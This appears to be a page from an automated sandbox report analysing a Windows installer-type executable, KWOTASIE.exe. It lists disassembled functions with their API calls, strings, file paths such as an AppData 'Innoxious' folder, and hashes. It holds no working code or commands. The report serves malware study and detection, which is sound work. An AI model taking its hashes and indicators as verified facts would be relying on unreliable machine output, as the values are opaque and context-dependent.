API String ID: 354199918-3934075578
Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E

Function 004053EF Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040544D
GetDlgItem.USER32(?,000003EE), ref: 0040545C
GetClientRect.USER32(?,?), ref: 00405499
GetSystemMetrics.USER32(00000002), ref: 004054A0
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
ShowWindow.USER32(?,00000008), ref: 0040553C
GetDlgItem.USER32(?,000003EC), ref: 0040555D
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
GetDlgItem.USER32(?,000003F8), ref: 0040546B

Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224

GetDlgItem.USER32(?,000003EC), ref: 004055AF
CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055C4
ShowWindow.USER32(00000000), ref: 004055E8
ShowWindow.USER32(?,00000008), ref: 004055ED
ShowWindow.USER32(00000008), ref: 00405637
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
CreatePopupMenu.USER32 ref: 0040567C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405690
GetWindowRect.USER32(?,?), ref: 004056B0
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
OpenClipboard.USER32(00000000), ref: 00405711
EmptyClipboard.USER32 ref: 00405717
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
GlobalLock.KERNEL32(00000000), ref: 0040572D
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
GlobalUnlock.KERNEL32(00000000), ref: 00405761
SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
CloseClipboard.USER32 ref: 00405772

Strings

6B, xrefs: 004056DD
{, xrefs: 00405655
Lx, xrefs: 00405641

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: Lx${$6B
API String ID: 4154960007-3539035231
Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68

Function 0040595A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405983
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy202D.tmp\*.*,\*.*), ref: 004059CB
lstrcatW.KERNEL32(?,0040A014), ref: 004059EE
lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsy202D.tmp\*.*,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 004059F4
FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsy202D.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsy202D.tmp\*.*,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A04
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
FindClose.KERNELBASE(00000000), ref: 00405AB3

Strings

\*.*, xrefs: 004059C5
C:\Users\user\AppData\Local\Temp\nsy202D.tmp\*.*, xrefs: 004059B3, 004059B9, 004059CA, 00405A03
"C:\Users\user\Desktop\KWOTASIE.exe", xrefs: 0040595A
C:\Users\user\AppData\Local\Temp\, xrefs: 00405968

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsy202D.tmp\*.*$\*.*
API String ID: 2035342205-2179781869
Opcode ID: 605fd81be1f41f38ce9b100556876732106d54cf1fc53f7772c9c8b4b7d1963f
Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
Opcode Fuzzy Hash: 605fd81be1f41f38ce9b100556876732106d54cf1fc53f7772c9c8b4b7d1963f
Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE

Function 0040658F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00426738,C:\,00405C6E,C:\,C:\,00000000,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 0040659A
FindClose.KERNELBASE(00000000), ref: 004065A6

Strings

C:\, xrefs: 0040658F
8gB, xrefs: 00406590

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8gB$C:\
API String ID: 2295610775-735758550
Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC

Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45

Function 00403D08 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
ShowWindow.USER32(?), ref: 00403D61
DestroyWindow.USER32 ref: 00403D75
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
GetDlgItem.USER32(?,?), ref: 00403DB2
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
IsWindowEnabled.USER32(00000000), ref: 00403DCD
GetDlgItem.USER32(?,00000001), ref: 00403E7B
GetDlgItem.USER32(?,00000002), ref: 00403E85
SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
GetDlgItem.USER32(?,00000003), ref: 00403F96
ShowWindow.USER32(00000000,?), ref: 00403FB7
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
EnableWindow.USER32(?,?), ref: 00403FE4
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
EnableMenuItem.USER32(00000000), ref: 00404001
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
SetWindowTextW.USER32(?,004236E8), ref: 0040406A
ShowWindow.USER32(?,0000000A), ref: 0040419E

Strings

6B, xrefs: 00404046
Lx, xrefs: 004040B8

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Lx$6B
API String ID: 3282139019-3681921830
Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D

Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653

lstrcatW.KERNEL32(1033,004236E8), ref: 004039DB
lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\Innoxious,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\Innoxious,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403A79
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Innoxious), ref: 00403AC2

Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0

RegisterClassW.USER32(004291A0), ref: 00403AFF
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B4C
ShowWindow.USER32(00000005,00000000), ref: 00403B82
GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
RegisterClassW.USER32(004291A0), ref: 00403BC4
DialogBoxParamW.USER32(?,00000000,00403D08,00000000), ref: 00403BE3

Strings

RichEd20, xrefs: 00403B88
_Nb, xrefs: 00403ADE, 00403B46
RichEdit, xrefs: 00403BB5
.DEFAULT\Control Panel\International, xrefs: 004039C6
RichEd32, xrefs: 00403B96
Control Panel\Desktop\ResourceLocale, xrefs: 0040398E
6B, xrefs: 00403986
RichEdit20W, xrefs: 00403BA6, 00403BAC
.exe, xrefs: 00403A68
Remove folder: , xrefs: 00403A22, 00403A2B, 00403A39, 00403A88, 00403A8E
1033, xrefs: 0040397A, 004039D6
C:\Users\user\AppData\Local\Innoxious, xrefs: 004039EA, 004039F2, 00403A95, 00403A9B, 00403AAB
"C:\Users\user\Desktop\KWOTASIE.exe", xrefs: 0040395E
C:\Users\user\AppData\Local\Temp\, xrefs: 00403966

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Innoxious$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
API String ID: 1975747703-1784403910
Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D

Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402ED2
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\KWOTASIE.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE

Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KWOTASIE.exe,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A

Strings

Null, xrefs: 00402FB8
C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
Error launching installer, xrefs: 00402F11
Inst, xrefs: 00402FA6
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
soft, xrefs: 00402FAF
C:\Users\user\Desktop\KWOTASIE.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
"C:\Users\user\Desktop\KWOTASIE.exe", xrefs: 00402EC1
C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\KWOTASIE.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-2100042470
Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD

Function 0040626E Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 004063AF
GetWindowsDirectoryW.KERNEL32(Remove folder: ,00000400,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,?,004052E7,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000), ref: 004063C2
SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,?,004052E7,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000), ref: 004063FE
SHGetPathFromIDListW.SHELL32(00410EA0,Remove folder: ), ref: 0040640C
CoTaskMemFree.OLE32(00410EA0), ref: 00406417
lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,?,004052E7,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000), ref: 00406495

Strings

Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\, xrefs: 00406293
Remove folder: , xrefs: 00406298, 00406373, 0040637A, 0040637E, 00406398, 00406399, 004063AE, 004063C1, 004063DD, 00406408, 0040643C, 00406442, 0040645E, 00406471, 0040648E, 00406494, 004064A0, 004064D3
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040637F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406437

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-2910227427
Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Unknownness,Unknownness,00000000,00000000,Unknownness,C:\Users\user\AppData\Local\Innoxious\olivilin,?,?,00000031), ref: 004017D5

Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259

